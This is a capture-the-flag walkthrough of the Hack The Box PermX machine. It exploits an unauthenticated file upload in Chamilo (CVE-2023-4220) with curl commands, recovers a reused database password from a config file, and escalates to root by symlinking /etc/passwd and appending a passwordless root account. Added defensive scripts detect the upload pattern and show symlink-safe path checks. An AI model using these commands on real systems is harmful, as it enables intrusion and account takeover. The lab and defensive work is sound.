PermX Lab
Hack the Box Penetration Lab
Reconnaissance
First up, a port scan:
┌──(zero㉿zero)-[~]
└─$ rustscan 10.10.11.23
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/zero/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.23:22
Open 10.10.11.23:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 22,80 10.10.11.23
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 10:15 PDT
Initiating Ping Scan at 10:15
Scanning 10.10.11.23 [2 ports]
Completed Ping Scan at 10:15, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:15
Completed Parallel DNS resolution of 1 host. at 10:15, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:15
Scanning 10.10.11.23 [2 ports]
Discovered open port 80/tcp on 10.10.11.23
Discovered open port 22/tcp on 10.10.11.23
Completed Connect Scan at 10:15, 0.24s elapsed (2 total ports)
Nmap scan report for 10.10.11.23
Host is up, received syn-ack (0.12s latency).
Scanned at 2024-08-10 10:15:17 PDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
Two ports are open: 22 (ssh) and 80 (http). I also ran a quick nmap service scan to see what URL the web server points to.
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
The redirect points to a website: permx.htb. After adding it to my hosts file I browsed to it.
It looks to be some sort of online learning platform! Time to poke around and see what I can find. Poking around the website didn't yield much, and neither did a feroxbuster scan.
┌──(zero㉿zero)-[~]
└─$ feroxbuster -u http://permx.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.4
───────────────────────────┬──────────────────────
🎯 Target Url │ http://permx.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.4
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 304c http://permx.htb/css => http://permx.htb/css/
301 GET 9l 28w 304c http://permx.htb/lib => http://permx.htb/lib/
200 GET 434l 827w 7929c http://permx.htb/css/style.css
200 GET 1l 38w 2302c http://permx.htb/lib/easing/easing.min.js
200 GET 8l 81w 5070c http://permx.htb/img/testimonial-4.jpg
200 GET 107l 604w 40660c http://permx.htb/img/course-2.jpg
200 GET 59l 359w 33963c http://permx.htb/img/team-1.jpg
200 GET 94l 537w 57860c http://permx.htb/img/team-3.jpg
200 GET 56l 315w 34720c http://permx.htb/img/course-1.jpg
200 GET 7l 279w 42766c http://permx.htb/lib/owlcarousel/owl.carousel.min.js
200 GET 126l 738w 60325c http://permx.htb/img/cat-3.jpg
200 GET 3l 148w 8156c http://permx.htb/lib/wow/wow.min.js
200 GET 11l 188w 16953c http://permx.htb/lib/animate/animate.min.css
200 GET 162l 1097w 114385c http://permx.htb/img/carousel-1.jpg
200 GET 206l 1251w 90219c http://permx.htb/img/about.jpg
200 GET 542l 1651w 16517c http://permx.htb/lib/wow/wow.js
200 GET 1579l 2856w 23848c http://permx.htb/lib/animate/animate.css
200 GET 6l 3782w 164194c http://permx.htb/css/bootstrap.min.css
301 GET 9l 28w 304c http://permx.htb/img => http://permx.htb/img/
200 GET 5l 69w 4677c http://permx.htb/img/testimonial-3.jpg
200 GET 14l 81w 5311c http://permx.htb/img/testimonial-1.jpg
200 GET 6l 80w 5378c http://permx.htb/img/testimonial-2.jpg
200 GET 112l 581w 45923c http://permx.htb/img/course-3.jpg
200 GET 41l 273w 28085c http://permx.htb/img/team-2.jpg
200 GET 138l 705w 57467c http://permx.htb/img/cat-1.jpg
200 GET 132l 738w 55021c http://permx.htb/img/cat-2.jpg
200 GET 109l 597w 49102c http://permx.htb/img/team-4.jpg
200 GET 158l 719w 58188c http://permx.htb/img/cat-4.jpg
200 GET 239l 1265w 101629c http://permx.htb/img/carousel-2.jpg
301 GET 9l 28w 303c http://permx.htb/js => http://permx.htb/js/
200 GET 6l 64w 2936c http://permx.htb/lib/owlcarousel/assets/owl.carousel.min.css
200 GET 275l 899w 14753c http://permx.htb/contact.html
200 GET 238l 922w 13018c http://permx.htb/testimonial.html
200 GET 7l 158w 9028c http://permx.htb/lib/waypoints/waypoints.min.js
200 GET 208l 701w 10428c http://permx.htb/404.html
200 GET 109l 205w 2698c http://permx.htb/js/main.js
200 GET 6l 41w 936c http://permx.htb/lib/owlcarousel/assets/owl.theme.green.min.css
200 GET 50l 141w 1303c http://permx.htb/lib/owlcarousel/assets/owl.theme.default.css
200 GET 170l 431w 4028c http://permx.htb/lib/owlcarousel/assets/owl.carousel.css
200 GET 35l 179w 5340c http://permx.htb/lib/owlcarousel/assets/ajax-loader.gif
200 GET 50l 141w 1301c http://permx.htb/lib/owlcarousel/assets/owl.theme.green.css
200 GET 6l 41w 936c http://permx.htb/lib/owlcarousel/assets/owl.theme.default.min.css
200 GET 20l 133w 8179c http://permx.htb/lib/owlcarousel/assets/owl.video.play.png
200 GET 275l 912w 14806c http://permx.htb/team.html
200 GET 367l 1362w 20542c http://permx.htb/about.html
200 GET 388l 1519w 22993c http://permx.htb/courses.html
200 GET 587l 2466w 36182c http://permx.htb/index.html
200 GET 0l 0w 0c http://permx.htb/lib/waypoints/links.php
200 GET 587l 2466w 36182c http://permx.htb/
200 GET 168l 960w 4092c http://permx.htb/lib/easing/easing.js
200 GET 23l 172w 1090c http://permx.htb/lib/owlcarousel/LICENSE
200 GET 3275l 9533w 85368c http://permx.htb/lib/owlcarousel/owl.carousel.js
[####################] - 2m 62384/62384 0s found:52 errors:0
[####################] - 2m 62282/62282 503/s http://permx.htb/
[####################] - 6s 62282/62282 9583/s http://permx.htb/css/ => Directory listing
[####################] - 5s 62282/62282 11568/s http://permx.htb/lib/ => Directory listing
[####################] - 6s 62282/62282 9686/s http://permx.htb/lib/easing/ => Directory listing
[####################] - 0s 62282/62282 184813/s http://permx.htb/lib/animate/ => Directory listing
[####################] - 7s 62282/62282 9398/s http://permx.htb/lib/owlcarousel/ => Directory listing
[####################] - 0s 62282/62282 240471/s http://permx.htb/lib/wow/ => Directory listing
[####################] - 6s 62282/62282 9938/s http://permx.htb/js/ => Directory listing
[####################] - 0s 62282/62282 145859/s http://permx.htb/img/ => Directory listing
[####################] - 0s 62282/62282 270791/s http://permx.htb/lib/owlcarousel/assets/ => Directory listing
[####################] - 0s 62282/62282 329534/s http://permx.htb/lib/waypoints/ => Directory listing
Time to try and find some subdomains!
┌──(zero㉿zero)-[~]
└─$ ffuf -u http://permx.htb -H "Host:FUZZ.permx.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fw 18
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://permx.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.permx.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 18
________________________________________________
www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 94ms]
lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 130ms]
:: Progress: [19966/19966] :: Job [1/1] :: 377 req/sec :: Duration: [0:00:52] :: Errors: 0 ::
This actually turned up something. The subdomain lms looks interesting, and navigating to it leads here:
A login page: a pretty decent start. Now a quick Google search to see if any public exploits exist. It turns out the platform has a well-known issue, CVE-2023-4220.
After researching the vulnerability and finding this article, it was clear that I could get a shell uploaded and working with very little effort. The issue lies in a file called bigUpload.php, which accepts an upload without sanitising the file name, so an attacker can upload a shell and then execute it.
I created a small test file and tried out the exploit:
┌──(zero㉿zero)-[~]
└─$ curl -F 'bigUploadFile=@bce1.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
┌──(zero㉿zero)-[~]
└─$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/bce1.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Success! The file I uploaded was executed by the server. Now for the real thing: uploading a reverse shell to gain access.
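From the defender's side, the two requests above leave a very recognisable trace in the web server's access log: a POST to bigUpload.php with action=post-unsupported, followed shortly by a request for a .php file inside the bigupload/files/ directory. The script below is an added example (not part of the original write-up and not Chamilo's code) that flags that pattern in Apache combined-format log lines. The log lines are constructed for the example: only the URL paths are taken from the write-up; the client addresses, timestamps and byte counts are made up.

```shell
#!/bin/sh
# Added example, not part of the original write-up: a small detector for the
# upload-then-execute pattern described above, run over Apache access log lines.
# The log lines are constructed for this example; only the URL paths come from
# the write-up, the client addresses, timestamps and sizes are made up.

SAMPLE_LOG='10.10.14.5 - - [10/Aug/2024:10:20:01 -0700] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 41 "-" "curl/8.5.0"
10.10.14.5 - - [10/Aug/2024:10:20:07 -0700] "GET /main/inc/lib/javascript/bigupload/files/bce1.php HTTP/1.1" 200 54 "-" "curl/8.5.0"
10.10.14.9 - - [10/Aug/2024:10:21:30 -0700] "GET /main/inc/lib/javascript/bigupload/files/report.pdf HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.10.14.9 - - [10/Aug/2024:10:22:02 -0700] "GET /main/inc/lib/javascript/bigupload/js/bigUpload.js HTTP/1.1" 200 6110 "-" "Mozilla/5.0"'

# detect_bigupload_abuse: read access log lines on stdin and print one line per
# suspicious request:
#   UPLOAD <client> <path>  a POST to the unauthenticated post-unsupported action
#   EXEC   <client> <path>  any request for a server-side script inside files/
detect_bigupload_abuse() {
    awk '
    {
        method = $6; sub(/^"/, "", method)   # strip the opening quote of "POST
        path = $7
        if (method == "POST" && index(path, "bigUpload.php?action=post-unsupported") > 0) {
            print "UPLOAD", $1, path
            next
        }
        sub(/\?.*/, "", path)                # ignore the query string for the extension check
        if (path ~ /\/bigupload\/files\/.*\.(php|phtml|phar)$/)
            print "EXEC", $1, path
    }'
}

# count_hits: number of suspicious lines found in the sample log, used as a
# quick self-check when the script is run directly.
count_hits() {
    printf '%s\n' "$SAMPLE_LOG" | detect_bigupload_abuse | wc -l | tr -d ' '
}

# Run it over the constructed sample: the two attacker requests are reported,
# the legitimate PDF download and the JavaScript asset are not.
printf '%s\n' "$SAMPLE_LOG" | detect_bigupload_abuse
```

Feeding a real log is a matter of replacing the sample with `detect_bigupload_abuse < /var/log/apache2/access.log`. The EXEC rule is the more valuable of the two: uploads are expected in that directory, but a request for a server-side script there should never occur in normal use, and patching to a Chamilo release that fixes CVE-2023-4220 removes the unauthenticated upload path entirely.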
Infiltration
The reverse shell I ended up using was from pentestmonkey. After gaining access to the system I upgraded to a stable shell to work from. It also looks like there is another non-root user on the system, someone called mtz.
$ ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Jan 20 2024 .
drwxr-xr-x 18 root root 4096 Jul 1 13:05 ..
drwxr-x--- 7 mtz mtz 4096 Aug 10 22:53 mtz
I was a little stuck, so I went digging and read that it's often worth searching for the configuration files of the login application. These may contain database locations and other information that can be used to log in as other users. Learning a new way to search for specific files was also handy for the future.
www-data@permx:/$ find /var/www/chamilo -name "configuration.php"
find /var/www/chamilo -name "configuration.php"
/var/www/chamilo/app/config/configuration.php
/var/www/chamilo/plugin/sepe/src/configuration.php
www-data@permx:/$
With the location of a config file known, it's time to see what's inside.
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
Bingo. A database with a password attached. This might give me some more information about the logins of specific users.
Using find once again, this time with a wildcard, to look for a database file turned up nothing useful. So I simply tried logging in as mtz with the password above. It worked.
www-data@permx:/$ find /var/www -name "*.db"
find /var/www -name "*.db"
/var/www/chamilo/vendor/szymach/c-pchart/resources/barcode/39.db
/var/www/chamilo/vendor/szymach/c-pchart/resources/barcode/128B.db
www-data@permx:/$ su mtz
su mtz
Password: 03F6lY3uXAP2bkW8
mtz@permx:/$
Okay, easier than I thought it would be. But normally the simplest answer is the right one. Right?
Anyway, after logging in I just used cd to get to mtz's home directory and found the user flag, along with some other funny files:
mtz@permx:/$ cd
cd
mtz@permx:~$ ls
ls
bro_what_do_you_actually_want linepase.sh oops root.txt user.txt
filetest linpeas.sh password.txt script.sh
mtz@permx:~$ cat password.txt
cat password.txt
asdasdasd:$1$AfQwwXsE$3jxOBWzMH3HO0yUM0oRmI:0:0:root:/root:/bin/bash
mtz@permx:~$ cat root.txt
cat root.txt
is these what you are looking for?🤣🤣🤣
mtz@permx:~$ cat user.txt
cat user.txt
Now it's time to try to get root access. There at least seems to be a clue in password.txt, but it turns out a lot of this stuff was junk. Next I checked which files I could execute with sudo permissions. There is a single file on the system I can run that way.
mtz@permx:~$ sudo -l
sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.sh
The file acl.sh, however, is not writeable, so I am unable to edit it.
This is where I get stuck most of the time. Getting root access has been a bit of a struggle for me; being new to this, I needed a little push in the right direction. I did some research and found that symlinks might be the way to proceed.
Also a small note: whenever I logged back into the machine the next day, for some reason unknown to me, this was missing:
mtz@permx:~$
I am still able to type and execute commands, just no clue why it vanishes; it seems very inconsistent.
Back to gaining root access. After reading up on symlinks, I was able to link the main passwd file to a temporary file, gain root access and find the flag.
mtz@permx:~$ ln -s /etc/passwd passwd
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/passwd
mtz@permx:~$ echo "root3::0:0:root3:/root:/bin/bash" >> ./passwd
mtz@permx:~$ su root3
mtz@permx:~$ whoami
root
The first line links /etc/passwd to my own temp file named passwd. The second line runs the only file I have sudo privileges for, which happens to change file permissions. The third line adds a root-level account called root3 to the file. After that I just hunted for the root flag!
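The root of this escalation is that a privileged helper accepted a path inside the user's home directory and changed permissions on it without noticing that the path was a symlink to /etc/passwd. The write-up never shows the source of /opt/acl.sh, so the script below is an added example of my own, not the box's helper, showing the check such a tool should perform before touching anything: refuse symlinks, accept only regular files, and canonicalise the path (which also resolves ../ and symlinked parent directories) before confirming it still lies under the allowed tree. The helper is assumed to take the allowed directory and the target path as arguments; the scratch directory layout in the demo is constructed for the example.

```shell
#!/bin/sh
# Added example, not the box's /opt/acl.sh (the write-up never shows its
# source): the target-path check a sudo-runnable "give a user access to a
# file" helper should do before changing anything.  The escalation above works
# because the helper follows a symlink under /home/mtz to /etc/passwd;
# resolving the path first and re-checking it closes that hole.

# check_target ALLOWED_DIR PATH
#   returns 0 if PATH is a regular, non-symlink file whose canonical location
#   is inside ALLOWED_DIR, 1 otherwise.
check_target() {
    allowed=$(readlink -f -- "$1") || return 1
    target=$2

    # A symlink is created by the caller but points wherever the caller likes.
    [ -L "$target" ] && return 1
    # Only regular files are acceptable: no directories, devices or sockets.
    [ -f "$target" ] || return 1
    # Canonicalise (resolves every ../ and any symlinked parent directory) and
    # require the result to still be under the allowed tree.
    resolved=$(readlink -f -- "$target") || return 1
    case "$resolved" in
        "$allowed"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Demonstration on a scratch directory (layout constructed for this example).
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/home/mtz" "$tmp/etc"
    echo "notes" > "$tmp/home/mtz/notes.txt"
    echo "secret" > "$tmp/etc/shadow-copy"
    ln -s "$tmp/etc/shadow-copy" "$tmp/home/mtz/passwd"   # the write-up's trick
    ln -s "$tmp/etc" "$tmp/home/mtz/etcdir"               # symlinked parent dir
    for p in "$tmp/home/mtz/notes.txt" \
             "$tmp/home/mtz/passwd" \
             "$tmp/home/mtz/etcdir/shadow-copy" \
             "$tmp/home/mtz/../../etc/shadow-copy"; do
        if check_target "$tmp/home/mtz" "$p"; then
            echo "allow $p"
        else
            echo "deny  $p"
        fi
    done
    rm -rf "$tmp"
}

demo
```

Only the plain notes.txt is allowed; the symlink, the path through a symlinked directory and the ../ traversal are all denied. A check like this still has a small window between the test and the permission change in which the file could be swapped, so a production helper should also verify the file's owner is the requesting user and should prefer interfaces that do not follow symlinks where the platform offers them.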
Conclusion
This box taught me a fair bit. I learnt about linking files, search queries and where to look for stored database passwords. I wish I had used linPEAS from the get-go, but now I know!